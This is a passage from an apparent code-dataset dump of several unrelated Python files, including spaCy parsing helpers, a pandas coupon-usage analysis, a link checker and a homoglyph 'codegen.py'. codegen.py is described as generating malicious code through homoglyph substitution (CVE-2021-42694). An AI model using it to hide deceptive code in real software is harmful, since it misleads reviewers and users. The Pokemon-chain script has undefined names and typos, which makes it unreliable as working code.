self.component_manager.long_running_result_callback\n self.start_tracker_thread(\n self.component_manager.get_obs_state,\n ObsState.EMPTY,\n self.timeout_id,\n self.timeout_callback,\n command_id=self.component_manager.release_id,\n lrcr_callback=lrcr_callback,\n )\n\n def update_task_status(self, result: ResultCode, message: str = \"\"):\n if result == ResultCode.FAILED:\n self.task_callback(\n status=TaskStatus.COMPLETED,\n result=result,\n exception=message,\n )\n else:\n self.task_callback(status=TaskStatus.COMPLETED, result=result)\n self.component_manager.command_in_progress = \"\"\n\n # pylint: disable=arguments-differ\n def do(self) -> Tuple[ResultCode, str]:\n \"\"\"\n Method to invoke ReleaseAllResources command on SDP Subarray.\n\n :param argin: None.\n\n return:\n None\n \"\"\"\n result_code, message = self.init_adapter()\n if result_code == ResultCode.FAILED:\n return result_code, message\n try:\n log_msg = (\n \"Invoking ReleaseAllResources command on \"\n + \"{}\".format(self.sdp_subarray_adapter.dev_name),\n )\n self.logger.debug(log_msg)\n self.sdp_subarray_adapter.ReleaseAllResources(\n self.component_manager.cmd_ended_cb\n )\n except (AttributeError, ValueError, TypeError, DevFailed) as e:\n self.logger.exception(\n \"Command invocation failed on ReleaseAllResources: %s\", e\n )\n return self.component_manager.generate_command_result(\n ResultCode.FAILED,\n \"The invocation of the ReleaseAllResources command is failed\"\n + \"on {}\".format(self.sdp_subarray_adapter.dev_name)\n + \"Reason: Error in invoking the ReleaseAllResourcescommand\"\n \"on Sdp\"\n + \"Subarray. The command has NOT been executed.\"\n + \"This device will continue with normal operation.\",\n )\n log_msg = (\n \"ReleaseAllResources command successfully invoked on:\"\n + \"{}\".format(self.sdp_subarray_adapter.dev_name)\n )\n self.logger.info(log_msg)\n return (ResultCode.OK, \"\")\n","sub_path":"src/ska_tmc_sdpsubarrayleafnode/commands/release_resources_command.py","file_name":"release_resources_command.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527395270","text":"Input= [0,1,-2,3,4,0,5,-27,9,0]\nOutput = [1,-2,3,4,5,-27,9,0,0,0]\n\nsample_array = [0,0,-3,4,0,0,9]\nzero_count=0\nresult=[]\n\nfor item in sample_array:\n\tif item==0:\n\t\tzero_count+=1\n\telse:\n\t\tresult.append(item)\n\nfor i in range(zero_count):\n\tresult.append(0)\t\n\nprint(result)\n","sub_path":"Problem5/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"401972877","text":"class Edge:\n \"\"\"\n This class represents the undirected edges which connect the different nodes.\n \"\"\"\n\n def __init__(self, start_node, end_node, is_taxi_line=False, is_bus_line=False, is_metro_line=False, is_ferry_line=False):\n \"\"\"\n Init-function of the Edge-class.\n :param start_node: First node which is connected to the edge\n :param end_node: Second node which is connected to the edge\n :param is_taxi_line: Boolean flag which shows if the current edge is a line of the taxi network\n :param is_bus_line: Boolean flag which shows if the current edge is a line of the bus network\n :param is_metro_line: Boolean flag which shows if the current edge is a line of the metro network\n :param is_ferry_line: Boolean flag which shows if the current edge is a line of the ferry network\n \"\"\"\n\n self.start_node = start_node\n self.end_node = end_node\n self.is_taxi_line = is_taxi_line\n self.is_bus_line = is_bus_line\n self.is_metro_line = is_metro_line\n self.is_ferry_line = is_ferry_line\n","sub_path":"edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"512054142","text":"pokemons = '''arceus piplup wooloo tyranitar audino bagon baltoy banette bidoof braviary bronzor carracosta charmeleon cresselia croagunk darmanitan deino emboar emolga exeggcute gabite greninja girafarig gulpin haxorus heatmor heatran ivysaur jellicent jumpluff kangaskhan kricketune landorus ledyba loudred lumineon lunatone machamp magnezone mamoswine nosepass petilil pidgeotto pikachu pinsir poliwrath poochyena porygon porygonz registeel relicanth remoraid rufflet sableye scolipede scrafty seaking sealeo silcoon simisear snivy snorlax spoink starly tirtouga trapinch treecko tyrogue vigoroth vulpix wailord wartortle whismur wingull yamask'''\r\n\r\n# Split through spacing \r\nlist_pokemons = pokemons.split(\" \")\r\n\r\n# Split all pokemons names into a dictionaru\r\npokemon_dict = {}\r\nfor names in list_pokemons:\r\n if names[0] not in pokemon_dict:\r\n pokemon_dict[names[0]] = [names]\r\n else:\r\n pokemon_dict[names[0]].append(names)\r\n\r\n\r\ndef list_creation(order):\r\n global longest_order\r\n \r\n\r\n # Check the longest \r\n if len(order) > longest_count:\r\n longest_count = len(order)\r\n longest_order = order\r\n\r\n # This is use to find the next value / Recursion\r\n if chain[-1][-1] in pokemon_dict:\r\n for name in pokemon_dict[order[-1][-1]]:\r\n if name not in order:\r\n oder.append(name)\r\n list_creation(order)\r\n\r\n\r\n# Iterate all the names of the pokemons\r\nfor order in list_pokemons:\r\n list_creation([order])\r\n\r\nprint(longest_order)\r\n","sub_path":"q8 assignment/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319788832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Author: Jakob Schaffarczyk \n# PGP: https://keyserver.ubuntu.com/pks/lookup?op=get&search=0x00bebdd0437ad513a4a0e13d93435cab4ca92fb9\n# Date: 02.11.2021\n\nfrom random import choice, random\nimport argparse\nimport re\nimport os\n\ndef about():\n print(\"Author: Jakob Schaffarczyk\")\n print(\"Date: 02.11.2021\")\n print(\"Name: codegen.py\")\n print(\"Version: v0.0.1\")\n print(\"\\nDescription\")\n print(\"Generate malicious code using homoglyphs (CVE-2021-42694)\")\n\ndef read_homoglyphs() -> dict:\n data = open(\"homoglyphs.txt\", \"r\").readlines()\n homoglyphs = {}\n for line in data:\n key = line[0]\n values = line[1:].strip()\n homoglyphs[key] = values\n return homoglyphs\n\ndef create_payload(template: bytes, random_char: bool = False) -> bytes:\n payload = template\n homoglyphs = read_homoglyphs()\n replacements = list(set(re.findall(rb'\\$.\\$', template)))\n for repl in replacements:\n char = chr(repl[1])\n if random_char:\n char = choice(homoglyphs[char]).encode()\n else:\n char = homoglyphs[char][0].encode()\n payload = payload.replace(repl, char)\n return payload\n\ndef main():\n # Parse command line arguments to object `args`\n parser = argparse.ArgumentParser(description=\"Generate malicious code using homoglyphs (CVE-2021-42694)\")\n parser.add_argument(\"-i\", \"--infile\", help=\"Input file containing homoglyph placeholders\")\n parser.add_argument(\"-o\", \"--outfile\", help=\"Output file to store the final code\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Set flag to choose random homoglyph; take first one if not set\")\n parser.add_argument(\"-a\", \"--about\", action=\"store_true\", help=\"Print about text\")\n args = vars(parser.parse_args())\n\n # Print about information\n if args[\"about\"]:\n about()\n exit(0)\n \n # Check if required parameters exist\n if not args[\"infile\"] and not args[\"outfile\"]:\n parser.print_usage()\n exit(0)\n if args[\"infile\"]:\n infile = args[\"infile\"]\n else:\n print(\"[!] Input file is missing\")\n exit(0)\n if args[\"outfile\"]:\n outfile = args[\"outfile\"]\n else:\n print(\"[!] Output file is missing\")\n exit(0)\n \n # Check if template exist\n if not os.path.exists(infile):\n print(\"[!] Input file does not exist\")\n exit(0)\n \n # Read input file\n template = open(infile, 'rb').read()\n\n # Create payload by replacing homoglyph placeholders\n if args[\"random\"]:\n payload = create_payload(template, random_char=True)\n else:\n payload = create_payload(template)\n \n # Store payload to output file\n with open(outfile, 'wb') as f:\n f.write(payload)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"427893166","text":"# coding: utf-8\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8') # python的str默认是ascii编码,和unicode编码冲突,需要加上这几句\r\n\r\nfrom matplotlib.font_manager import FontProperties\r\nfont = FontProperties(fname=r\"c:\\windows\\fonts\\simsun.ttc\", size=14) # 设置作图中显示中文字体\r\n\r\n\"\"\"\r\nhttps://tianchi.aliyun.com/notebook/detail.html?spm=5176.11409386.4851167.7.65c91d07FiVHVN&id=4796\r\n\r\n\"\"\"\r\n# import libraries necessary for this project\r\nimport os, sys, pickle\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\n\r\nimport seaborn as sns\r\n\r\nfrom datetime import date\r\n\r\nfrom sklearn.model_selection import KFold, train_test_split, StratifiedKFold, cross_val_score, GridSearchCV\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.linear_model import SGDClassifier, LogisticRegression\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import log_loss, roc_auc_score, auc, roc_curve\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport xgboost as xgb\r\nimport lightgbm as lgb\r\n\r\n\r\n# 数据分析\r\n\r\n\r\n# 读取数据以及简单分析\r\n\r\ndfoff = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_offline_stage1_train.csv')\r\ndftest = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_offline_stage1_test_revised.csv')\r\n\r\ndfon = pd.read_csv('F:/competition/O2O Coupon Usage Forecast/ccf_online_stage1_train.csv')\r\n\r\ndfoff.info()\r\n\r\nprint('有优惠券,购买商品条数', dfoff[(dfoff['Date_received'] != 'null') & (dfoff['Date'] != 'null')].shape[0])\r\nprint('无优惠券,购买商品条数', dfoff[(dfoff['Date_received'] == 'null') & (dfoff['Date'] != 'null')].shape[0])\r\nprint('有优惠券,不购买商品条数', dfoff[(dfoff['Date_received'] != 'null') & (dfoff['Date'] == 'null')].shape[0])\r\nprint('无优惠券,不购买商品条数', dfoff[(dfoff['Date_received'] == 'null') & (dfoff['Date'] == 'null')].shape[0])\r\n\r\n# 在测试集中出现的用户但训练集没有出现\r\nprint('1. User_id in training set but not in test set', set(dftest['User_id']) - set(dfoff['User_id']))\r\n# 在测试集中出现的商户但训练集没有出现\r\nprint('2. Merchant_id in training set but not in test set', set(dftest['Merchant_id']) - set(dfoff['Merchant_id']))\r\n\r\n\r\n# 优惠券与距离\r\n\r\nprint('Discount_rate 类型:',dfoff['Discount_rate'].unique())\r\nprint('Distance 类型:', dfoff['Distance'].unique())\r\n# unique输出所有不同的值\r\n\r\n# convert Discount_rate and Distance\r\n\r\ndef getDiscountType(row):\r\n if row == 'null':\r\n return 'null'\r\n elif ':' in row: # 满减,type=1,两种活动可能对用户使用优惠券的吸引力有所不同\r\n return 1\r\n else: # 打折,type=0\r\n return 0\r\n\r\n\r\ndef convertRate(row):\r\n \"\"\"Convert discount to rate 将满减或None转换为打折率\"\"\"\r\n if row == 'null':\r\n return 1.0 # 折率1.0\r\n elif ':' in row:\r\n rows = row.split(':')\r\n return 1.0 - float(rows[1]) / float(rows[0]) # 这种折算不准,但是有一定参考价值\r\n else:\r\n return float(row)\r\n\r\n\r\ndef getDiscountMan(row): # 将满减需要达到的金额提取出来作为一个特征,不属于此类型的定为0\r\n if ':' in row:\r\n rows = row.split(':')\r\n return int(rows[0])\r\n else:\r\n return 0\r\n\r\n\r\ndef getDiscountJian(row): # 将满减能优惠的金额提取出来作为一个特征,不属于此类型的定为0\r\n if ':' in row:\r\n rows = row.split(':')\r\n return int(rows[1])\r\n else:\r\n return 0\r\n\r\n\r\ndef processData(df):\r\n # convert discunt_rate\r\n # 通过apply的方式对于某一列的所有值进行函数处理\r\n df['discount_rate'] = df['Discount_rate'].apply(convertRate)\r\n df['discount_man'] = df['Discount_rate'].apply(getDiscountMan)\r\n df['discount_jian'] = df['Discount_rate'].apply(getDiscountJian)\r\n df['discount_type'] = df['Discount_rate'].apply(getDiscountType)\r\n\r\n print(df['discount_rate'].unique())\r\n\r\n # convert distance\r\n # 下面的程序实现了两个功能,首先将没有距离信息的值替换为-1,然后将所有值的字符型转换为int\r\n df['distance'] = df['Distance'].replace('null', -1).astype(int)\r\n print(df['distance'].unique())\r\n return df\r\n\r\ndfoff = processData(dfoff)\r\ndftest = processData(dftest)\r\n\r\n\r\n# 时间\r\n\r\n# 列出所有收到优惠券的不重复时间并对非空值进行排序\r\ndate_received = dfoff['Date_received'].unique()\r\ndate_received = sorted(date_received[date_received != 'null'])\r\n\r\ndate_buy = dfoff['Date'].unique()\r\ndate_buy = sorted(date_buy[date_buy != 'null'])\r\n\r\nprint('优惠券收到日期从',date_received[0],'到', date_received[-1])\r\nprint('消费日期从', date_buy[0], '到', date_buy[-1])\r\n\r\n# 看一下每天的顾客收到coupon的数目,以及收到coupon后用coupon消费的数目\r\n\r\n# 收到优惠券的数目\r\ncouponbydate = dfoff[dfoff['Date_received'] != 'null'][['Date_received', 'Date']]\\\r\n .groupby(['Date_received'], as_index=False).count()\r\n# groupby函数根据Date_received分组,并通过count计数,组数为收到优惠券日期的个数\r\n# 注意:这里的每一组都是每一行,一共只有两列,是['Date_received','count']\r\ncouponbydate.columns = ['Date_received','count']\r\n# 收到优惠券并使用的数目\r\nbuybydate = dfoff[(dfoff['Date'] != 'null') & (dfoff['Date_received'] != 'null')][['Date_received', 'Date']]\\\r\n .groupby(['Date_received'], as_index=False).count()\r\nbuybydate.columns = ['Date_received','count']\r\n\r\nsns.set_style('ticks')\r\nsns.set_context(\"notebook\", font_scale= 1.4)\r\nplt.figure(figsize = (12,8))\r\ndate_received_dt = pd.to_datetime(date_received, format='%Y%m%d')\r\n# 将日期变为 年-月-日 的格式\r\n\r\n# 作条形图\r\nplt.subplot(211)\r\nplt.bar(date_received_dt, couponbydate['count'], label = 'number of coupon received' )\r\nplt.bar(date_received_dt, buybydate['count'], label = 'number of coupon used')\r\nplt.yscale('log') # 纵坐标采用对数刻度\r\nplt.ylabel('Count')\r\nplt.legend()\r\n\r\nplt.subplot(212)\r\nplt.bar(date_received_dt, buybydate['count']/couponbydate['count']) # 使用优惠券的比例\r\nplt.ylabel('Ratio(coupon used/coupon received)')\r\nplt.tight_layout() # 图像外部边缘的调整可以使用plt.tight_layout()进行自动控制\r\n\r\n# 新建关于星期的特征\r\n\r\ndef getWeekday(row):\r\n if row == 'null':\r\n return row\r\n else:\r\n return date(int(row[0:4]), int(row[4:6]), int(row[6:8])).weekday() + 1\r\n # date(year, month, day),weekday()函数返回的是当前日期所在的星期数,返回的0-6代表周一--到周日\r\n\r\ndfoff['weekday'] = dfoff['Date_received'].astype(str).apply(getWeekday)\r\ndftest['weekday'] = dftest['Date_received'].astype(str).apply(getWeekday)\r\n\r\n# 新建 weekday_type 这一特征 : 周六和周日为1,其他为0。\r\ndfoff['weekday_type'] = dfoff['weekday'].apply(lambda x : 1 if x in [6,7] else 0 )\r\ndftest['weekday_type'] = dftest['weekday'].apply(lambda x : 1 if x in [6,7] else 0 )\r\n\r\n# change weekday to one-hot encoding\r\nweekdaycols = ['weekday_' + str(i) for i in range(1,8)]\r\nprint(weekdaycols)\r\n# 输出: ['weekday_1', 'weekday_2', 'weekday_3', 'weekday_4', 'weekday_5', 'weekday_6', 'weekday_7']\r\n\r\n# 将null值替换为numpy中的nan值,并根据weekday这一特征进行分列\r\ntmpdf = pd.get_dummies(dfoff['weekday'].replace('null', np.nan))\r\ntmpdf.columns = weekdaycols # 列的名称即weekdaycols\r\ndfoff[weekdaycols] = tmpdf # 将新的列加入dfoff中\r\n\r\ntmpdf = pd.get_dummies(dftest['weekday'].replace('null', np.nan))\r\ntmpdf.columns = weekdaycols\r\ndftest[weekdaycols] = tmpdf\r\n\r\n\r\n# 数据标注\r\n\r\n\"\"\"\r\nDate_received == 'null': y = -1\r\nDate != 'null' & Date-Date_received <= 15: y = 1\r\nOtherwise: y = 0\r\n\r\n\"\"\"\r\ndef label(row):\r\n if row['Date_received'] == 'null':\r\n return -1\r\n if row['Date'] != 'null':\r\n td = pd.to_datetime(row['Date'], format='%Y%m%d') - pd.to_datetime(row['Date_received'], format='%Y%m%d')\r\n if td <= pd.Timedelta(15, 'D'): # 后面的'D'代表天,若在十五天之内使用了,记为1\r\n return 1\r\n return 0\r\ndfoff['label'] = dfoff.apply(label, axis = 1) # dfoff执行label函数完成标注\r\nprint(dfoff['label'].value_counts())\r\n\r\n\"\"\"\r\n 0 988887\r\n\r\n-1 701602\r\n\r\n 1 64395\r\n\r\n\"\"\"\r\n\r\nprint('已有columns:',dfoff.columns.tolist())\r\n\r\n\"\"\"\r\n['User_id', 'Merchant_id', 'Coupon_id', 'Discount_rate', 'Distance', 'Date_received', 'Date', 'discount_rate', \r\n'discount_man', 'discount_jian', 'discount_type', 'distance', 'weekday', 'weekday_type', 'weekday_1', 'weekday_2', \r\n'weekday_3', 'weekday_4','weekday_5', 'weekday_6', 'weekday_7', 'label']\r\n\r\n\"\"\"","sub_path":"CouponUsage_DA.py","file_name":"CouponUsage_DA.py","file_ext":"py","file_size_in_byte":8781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575036602","text":"import pandas as pd\nimport sys\nfrom io import StringIO\n\n# checks if file is in proper csv format\n# passes if pandas can read_csv, and if 2 or more columns, and if 2 or more rows, comments are OK\n\ndef validate_xwellplate(text, required_column_names= ['plate_id', 'well_id', 'well_id_0']):\n try:\n messages = []\n success = True\n csv = pd.read_csv(StringIO(text), comment=\"#\")\n cols = csv.columns\n index = csv.index\n if len(cols) < 2:\n messages.append('Must have 2 or more columns in csv')\n success = False\n if len(index) < 2:\n messages.append('Must have 2 or more rows in csv')\n success = False\n return {\"success\": success, \"messages\": messages}\n for req_col in required_column_names:\n if req_col not in cols:\n success = False\n messages.append(f'Required column {req_col} missing')\n return {\"success\": success, \"messages\": messages}\n except:\n return {\"success\": False, \"messages\": [\"validate_csv(text) failed\"]}\n","sub_path":"python_scripts/validate_xwellplate.py","file_name":"validate_xwellplate.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"379140511","text":"# check404.py\n#\n# A simple python script to check for broken links in HTML files. Largely based\n# on my check404.sh program I wrote a while back, just ported to Python for\n# maintainability and to use a higher level scripting language then bash.\n\n\nimport sys\nif sys.version_info[0] < 3:\n # Python 2 specific imports\n from HTMLParser import HTMLParser\n import urlparse\nelse:\n # Python 3 specific imports\n from html.parser import HTMLParser\n from urllib.parse import urlparse\n import urllib3\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nimport argparse\nimport re\nimport requests\nimport glob\n\n\n# Terminal colors\n#\n# General use is like so:\n# print(tcolors.BLUE + \"This text is blue\" + tcolors.END)\nclass tcolors:\n END_COLOR = '\\033[0m' # Remove all formatting to console output\n UNDERLINE = '\\033[4m' # Add underline to console output\n RED = '\\033[91m' # Turn console output red\n GREEN = '\\033[92m' # Turn console output green\n YELLOW = '\\033[93m' # Turn console output yellow\n BLUE = '\\033[94m' # Turn console output blue\n PURPLE = '\\033[95m' # Turn console output purple\n CYAN = '\\033[96m' # Turn console output cyan\n\n\n# A simple HTML parser that prints color coded status codes to absolute URLs in\n# tags\nclass SimpleLinkParser(HTMLParser):\n def handle_starttag(self, tag, attrs):\n if (tag == 'a'):\n for key, value in attrs:\n if (key == 'href'):\n if (re.match(r'^https?:\\/\\/', value)):\n res = requests.get(value, verify=False)\n\n if (res.status_code >= 200 and res.status_code < 300):\n # Success\n print('{0}{1}{2} :: {3}'.format(tcolors.GREEN,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 300 and\n res.status_code < 400):\n # Redirect\n print('{0}{1}{2} :: {3}'.format(tcolors.YELLOW,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 400 and\n res.status_code < 500):\n # Client Error\n print('{0}{1}{2} :: {3}'.format(tcolors.RED,\n res.status_code,\n tcolors.END_COLOR,\n value))\n elif (res.status_code >= 500 and\n res.status_code < 600):\n # Server Error\n print('{0}{1}{2} :: {3}'.format(tcolors.RED,\n res.status_code,\n tcolors.END_COLOR,\n value))\n else:\n # Iunno man\n print('{0}{1}{2} :: {3}'.format(tcolors.CYAN,\n res.status_code,\n tcolors.END_COLOR,\n value))\n\n def handle_endtag(self, tag):\n pass\n\n def handle_data(self, data):\n pass\n\n\ndef main():\n app_description = ('A simple python script to test for broken links in '\n 'HTML files')\n # Get command-line Args\n parser = argparse.ArgumentParser(app_description)\n\n # Flags\n pass\n\n # Required Arguments\n parser.add_argument(\n 'html_files',\n type=str,\n nargs='+',\n help='Path(s) to HTML files')\n\n args = parser.parse_args()\n\n link_parser = SimpleLinkParser()\n\n htmlfiles = args.html_files\n if (len(htmlfiles) == 1):\n htmlfiles = glob.glob(htmlfiles[0])\n\n for html_file in htmlfiles:\n try:\n f = open(html_file)\n contents = f.read()\n f.close()\n\n link_parser.feed(contents)\n except Exception as e:\n print('--- An Exception occured ---')\n print('Exception instance: {0}'.format(type(e)))\n print('Exception args: {0}'.format(e.args))\n print(e)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/check404.py","file_name":"check404.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"129760722","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport spacy\nfrom spacy import displacy\nimport re\nimport nltk\n\n\n# In[2]:\n\nnlp = spacy.load('en_core_web_lg')\n#nlp = spacy.load('C:\\\\anaconda3\\\\lib\\\\site-packages\\\\en_core_web_sm\\\\en_core_web_sm-2.0.0')\n\n\n# In[7]:\n\n\n# doc=nlp(u'hello')\n# b=doc.to_bytes()\n\ndef get_pos_entities_parsed(sent):\n parsed_text_dict = {}\n doc = nlp(sent)\n posSent = \" \".join([token.text + '/' +token.pos_ for token in doc])\n entities = \"\\t\".join([token.text + '/' +token.label_+\"/\" + str(token.start_char) + \"/\" + str(token.end_char) for token in doc.ents])\n for token in doc:\n parsed_text_dict[token.i] = ([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [(child.text, child.i) for child in token.children]])\n \n return (posSent, entities, parsed_text_dict)\n\n# #### This method will return POS tagged data\n# * Format will be word1/POS word2/POS word3/POS\n\n# In[3]:\n\ndef getPosTaggedData(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = \" \".join([token.text + '/' +token.pos_ for token in doc])\n return posSent\n\n\n# In[38]:\n\n\n#text = 'Apple is looking at buying U.K. startup for $1 billion'\n#text = 'Wealth management is an investment-advisory discipline which incorporates financial planning, investment portfolio management and a number of aggregated financial services offered by a complex mix of asset managers, custodial banks, retail banks, financial planners and others'\n#getPosTaggedData(text)\n\n\n# In[5]:\n\n\ndef getEntitiesTagged(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = \"\\t\".join([token.text + '/' +token.label_+\"/\" + str(token.start_char) + \"/\" + str(token.end_char) for token in doc.ents])\n return posSent\n\n\n# In[1]:\n\n\ndef getEntitiesTaggedAsList(sent):\n posSent = ''\n doc = nlp(sent)\n posSent = [(token.text, token.label_, str(token.start_char), str(token.end_char)) for token in doc.ents]\n return posSent\n\n\n# #### This method will return entities, word, start pos, end pos\n\n# In[6]:\n\n\n#getEntitiesTagged('Apple is looking at buying U.K. startup for $1 billion')\n\n\n# In[7]:\n\n\ndef getParseDataFromTextDict(sent):\n parsed_text_dict = {}\n doc = nlp(sent)\n #displacy.render(doc, style='dep', jupyter=True)\n for token in doc:\n parsed_text_dict[token.i] = ([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [(child.text, child.i) for child in token.children]])\n #print(token)\n return parsed_text_dict\n\n\n# In[39]:\n\n\ndef getParseDataFromText(sent):\n parsed_text_list = []\n doc = nlp(sent)\n #displacy.render(doc, style='dep', jupyter=True)\n for token in doc:\n parsed_text_list.append([token.text, token.dep_, token.head.text, token.head.pos_, [(child.text, child.i) for child in token.children]])\n #print(token)\n return parsed_text_list\n\n#text = 'Wealth management is an investment-advisory discipline which incorporates financial planning, investment portfolio management and a number of aggregated financial services offered by a complex mix of asset managers, custodial banks, retail banks, financial planners and others'\n#for line in getParseDataFromText(text):\n# print(line)\n#visualizeParsedText(text)\n\n\n# In[9]:\n\n\n# sent = 'Apple is looking at buying U.K. startup for $1 billion'\n# doc = nlp(sent)\n# for token in doc:\n# parsed_text_list.append([token.text, token.dep_, token.head.text, token.head.i, token.head.pos_, [child.text for child in token.children]])\n# for child in token.children:\n# print(child, '\\t', child.i, '\\t')\n\n\n# In[4]:\n\n\ndef visualizeParsedText(sent):\n doc = nlp(sent)\n displacy.render(doc, style='dep', jupyter=True)\n\n\n# In[5]:\n\n\n## Create verb to subject and object mapping\n#visualizeParsedText('Apple is looking at buying U.K. startup for $1 billion')\n\n# sentence = 'A private equity fund is a collective investment scheme used for making investments in various equity ( and to a lesser extent debt ) securities according to one of the investment strategies associated with private equity.'\n# visualizeParsedText(sentence)\n\n# print(getAllSubjectObjectRelation(getParseDataFromText(sentence), getPosTaggedData(sentence)))\n\n\n# In[12]:\n\n\n#visualizeParsedText('Mouse has been killed by the cat')\n#visualizeParsedText('Cat killed the mouse')\n\n\n# In[13]:\n\n\ndef getIndexParsedText(parsedDataFromSpacy, tokenTempIndex):\n for index in range(len(parsedDataFromSpacy)):\n if parsedDataFromSpacy[index][0] == tokenTempIndex:\n return index\n \n return -1\n\n\n# In[32]:\n\n\ndef expandText(parsedDataFromSpacy, pos_data, token):\n #print(token)\n \n #print(pos_data)\n text = re.search('(([A-Za-z\\\\d\\\\.]+/(NOUN|PROPN) )+)?'+ token +'/[A-Za-z]+()?(([A-Za-z\\\\d\\\\.]+/(NOUN|PROPN) )+)?', pos_data).group()\n return \" \".join([textSplit.split('/')[0] for textSplit in text.split(' ')])\n\ndef expandTextNew(parsedDataFromSpacy, tokenTempIndex):\n consider =['compound', 'quantmod', 'amod', 'npadvmod', 'det', 'conj']\n returnText = ''\n for index in range(0, len(parsedDataFromSpacy)):\n token = parsedDataFromSpacy[index][0]\n rel = parsedDataFromSpacy[index][1]\n head = parsedDataFromSpacy[index][2]\n head_index = parsedDataFromSpacy[index][3]\n head_pos = parsedDataFromSpacy[index][4]\n childs = parsedDataFromSpacy[index][5]\n if index == tokenTempIndex:\n indexList = []\n for child in childs:\n if parsedDataFromSpacy[child[1]][1] in consider:\n indexList.append(child[1])\n indexList.append(tokenTempIndex)\n \n for index in range(min(indexList), max(indexList)+1):\n returnText += ' ' + parsedDataFromSpacy[index][0]\n return returnText.strip()\n #print(returnText.strip())\n\n#text = 'Apple is looking at buying U.K. startup for $1 billion'\n#text = 'This means that a legal mechanism is put into place which allows the lender to take possession and sell the secured property (\"foreclosure\" or \"repossession\") to pay off the loan in the event the borrower defaults on the loan or otherwise fails to abide by its terms.'\n#expandTextNew(getParseDataFromTextDict(text), 21)\n\n\n# ### Check for object presence on the basis of subject\n# * If subject is at left then object should be at right side of the verb\n# * Vice-versa\n\n# In[33]:\n\n\n# Find if currText is child of text\ndef isChildOf(parsedDataFromSpacy, currText, text, position):\n for parsedText in parsedDataFromSpacy:\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_pos = parsedText[3]\n childs = parsedText[4]\n ## Immediate child\n if head_text == text:\n #print(currText, text)\n if currText in childs:\n return True\n \n return False \n\n\n# In[34]:\n\n\ndef getSubject(parsedDataFromSpacy, textIndex):\n for index in parsedDataFromSpacy.keys():\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n \n if dep == 'nsubj' and head_text_index == textIndex:\n returnText = expandTextNew(parsedDataFromSpacy, index)\n return returnText\n return '' \n\n\n# In[35]:\n\n\ndef getObject(parsedDataFromSpacy, indexTemp):\n for index in range(0, len(parsedDataFromSpacy)):\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n #print(indexTemp, parsedDataFromSpacy[index])\n if dep in ['dobj', 'pobj'] and head_text_index == indexTemp:\n #print(parsedDataFromSpacy[index])\n returnText = expandTextNew(parsedDataFromSpacy, index)\n return returnText\n \n return ''\n\n\n# In[36]:\n\n\ndef getAllSubjectObjectRelation(parsedDataFromSpacy):\n # list of tuple of type (subj, verb, obj)\n subj_obj_rel = []\n \n for index in range(0, len(parsedDataFromSpacy)):\n parsedText = parsedDataFromSpacy[index]\n token = parsedText[0]\n dep = parsedText[1]\n head_text = parsedText[2]\n head_text_index = parsedText[3]\n head_pos = parsedText[4]\n childs = parsedText[5]\n \n if head_pos=='VERB':\n #if head_text != 'incorporates':\n # continue\n subject_ = getSubject(parsedDataFromSpacy, head_text_index)\n #print(subject_)\n object_ = getObject(parsedDataFromSpacy, head_text_index)\n subj_obj_rel.append((subject_, head_text, object_))\n #print((subject_, head_text, object_))\n return set(subj_obj_rel)\n\n#parsedText = getParseDataFromTextDict('Apple is looking at buying U.K. startup for $1 billion')\n#print(parsedText)\n#parsedText = getParseDataFromTextDict('Dr Costanza Russo has developed a partnership with the Seven Pillars Institute for Global Finance and Ethics based in Kansas, and is working on a research project with Justice Blair and others on how to create an ethical culture in the banking sector.')\n#parsedText = getParseDataFromTextDict('Mortgages can either be funded through the banking sector (that is, through short-term deposits) or through the capital markets through a process called \"securitization\", which converts pools of mortgages into fungible bonds that can be sold to investors in small 